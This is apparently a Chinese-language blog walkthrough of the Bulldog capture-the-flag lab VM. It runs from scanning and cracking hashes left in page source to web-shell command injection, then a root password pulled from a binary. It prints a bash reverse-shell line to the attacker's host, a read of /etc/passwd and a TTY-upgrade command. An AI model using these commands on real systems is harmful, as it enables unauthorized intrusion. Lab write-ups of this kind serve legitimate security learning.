安装完bulldog靶机
不知道是我vm的问题还是我哪里配置不行,最近这两个靶场的ip一开始都搜不到,和jis-ctf上一篇一样,需要把网卡改成ens33.
按照惯例,nmap扫一下局域网,扫出来是192.168.144.137
再扫一下端口,发现23,80,8080端口都开启,那就访问一下http网页。
写了一堆废话
老三样,再扫一下目录 dirb
发现
DIRECTORY: http://192.168.144.137/admin/
DIRECTORY: http://192.168.144.137/dev/
直接访问http://192.168.144.137/admin/ 发现需要登陆,F12看一下很干净,没藏东西。
输入了一些参数抓了一下包,试图用sqlmap强行爆破一下,没有发现注入点。
访问一下http://192.168.144.137/dev/ 试试看,里面有很多信息
记录了很多联系人账号
点击web-shell显示需要权限,可以联想到需要在前面admin页面登录之后才可以访问。
所以回到dev界面找找蛛丝马迹。
F12看一下有没有藏东西,仔细一看还真有,虽然正常网页并不会傻傻的把password放再html里,但是emmm。
一个一个试试看,发现ddf45997a7e18a25ad5f5cf222da64814dd060d5解码出来是bulldog
d8b8dd5e7f000b8dea26ef8428caf38c04466b3e解码出来是bulldoglover。
回到登录界面试试,nick可以用bulldog登录,sarah可以用bulldoglover登录(权限似乎都是一样的)
回到/dev/shell页面,发现了一个建议shell界面
试试ifconfig
&组合一下发现可以并发
这个时候就想到了反弹shell,再kali监听1234号端口
简单的&组合直接跑会500报错echo&bash -i >& /dev/tcp/192.168.144.129/1234 0>&1
找了一下资料,换成这样echo "bash -i >& /dev/tcp/192.168.144.129/1234 0>&1" | bash就ok拉
进去了就看看系统有什么用户,cat etc/passwd看一下
发现了自己django,然后注意到有个id是bulldogadmin的很可疑,再系统中查找一下bulldogadmin所属的文件find / -user bulldogadmin 2>/dev/null(2>/dev/null
: 将标准错误输出重定向到 /dev/null)这个和通道有关,下次学到了再记笔记。
发现有两个隐藏文件(其实其他的我也打开来看了一下,没啥有用的)
less .hiddenadmindirectory/note,发现里面写了点东西,但是没锤子用
less .hiddenadmindirectory/customPermissionApp发现一堆乱码,用strings打开一下
这个时候还是有点懵逼,把里面的东西全部丢给chatgpt,让他帮审计一下,发现SUPERultH
imatePASHSWORDyouHCANTget有点像密码.
试试进入root模式,su一下发现没用terminal
第一次遇到这种情况,查了资料发现需要先调用本地shell
python -c 'import pty;pty.spawn("/bin/bash")'
输入SUPERultimatePASSWORDyouCANTget,密码错误,又去找了找前辈的答案,发现H都是多余的,SUPERultimatePASSWORDyouCANTget
回到最初的menu,ls发现有个txt文件,vi一下,
结束,感谢@Komorebi的帖子的指导